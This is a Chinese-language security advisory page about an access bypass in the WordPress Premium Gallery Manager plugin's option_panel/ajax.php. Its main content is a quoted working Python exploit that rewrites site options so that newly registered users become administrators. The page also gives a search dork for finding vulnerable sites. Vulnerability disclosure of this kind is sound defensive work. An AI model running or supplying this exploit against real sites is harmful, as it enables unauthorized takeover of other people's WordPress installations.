安全研究
安全漏洞
WordPress Premium Gallery Manager插件'option_panel/ajax.php'访问绕过漏洞
发布日期:2014-09-05
更新日期:2014-09-09
受影响系统:
WordPress Premium Gallery Manager描述:
BUGTRAQ ID: 69663
WordPress Premium Gallery Manager插件可根据需要创建图库。
WordPress Premium Gallery Manager插件在option_panel/ajax.php的实现上存在访问绕过漏洞,成功利用后可使攻击者绕过某些安全限制并执行未授权操作。
<*来源:Hannaichi
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#Author : Hannaichi [@dntkun]
#Date : February 5th, 2014
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : Unauthenticated Configuration Access
#Tested On : Windows 7 32-bit | Google Chrome
#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
#POC :
Save File As Python (.py) =
import httplib, urllib
#target site
site = "victim" #<--- no http:// or https://
#path to ajax.php
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "youremail@test.com")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
#Place It Broo No Lazy For This :D !!
--------------------------------------------------------------------------------------------------------------------
Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://wordpress.org/
浏览次数:1923
严重程度:0(网友投票)
绿盟科技给您安全的保障